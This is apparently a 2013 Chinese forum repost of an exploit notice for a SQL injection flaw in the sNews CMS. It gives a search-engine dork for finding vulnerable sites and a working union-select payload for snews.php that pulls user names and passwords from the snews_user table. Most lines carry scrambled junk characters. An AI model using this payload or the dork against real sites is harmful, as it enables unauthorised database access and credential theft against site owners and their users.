标题: CMS snews SQL Injection Vulnerability
9 I( a0 \6 q; z1 E/ l& N& y, e1 P作者: By onestree
3 X; _1 I5 N4 G下载地址 : http://snewscms.com/* w1 b9 H; w8 q( a# C- E+ C
测试平台 : ubuntu 12.10 / win 7
3 x2 m- x3 F7 t' |+ ]( h, |, \关键词: inurl:"tanyakan pada rumput yang bergoyang"& y$ U0 G! d0 @$ r/ s: i
: G1 r1 q! v$ m: G i) ? . O, \: A) R/ m
*************************************************************' ]2 I; u5 z' e0 x% D5 {. E3 r4 D
: z) k# b- f' z3 Y9 W
SQL poc:
8 r1 ?. A* M8 u. F5 y% @2 @
; x; m# M1 K/ b' Y6 h. Z0 m! ^http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
3 _1 D8 D& ?4 K ( U; v- c3 C. P) ?1 z2 b
示例. y, h' W+ T& \8 ~9 ?/ B& E3 ~
# L" i. m9 k9 I8 z9 f7 y# z2 v3 }
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/** |: k, m; x2 E. d3 \& J
- f- K( e$ M+ |0 J9 V% [& Q
- {+ f! ]+ N2 V2 @9 m" d# V s3 d致谢:$ a, R! A+ c; B. |- d* a
$ n! O+ D+ I1 v6 X
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
1 j" Y# ]5 W* `& Z2 ?2 Q A8 |+ s" E
( D) y) S' n" X; j$ o) L1 t indonesiancoder - moeslimh4x0r - go-coder/ C1 x8 Y( A& q! H' }+ _+ g
5 u# o# D( J7 ~7 W6 |
spesial my hunny :*" `) O2 u" ]# y6 o3 k
|
发表于 2013-1-23 08:55:06
收藏
支持
反对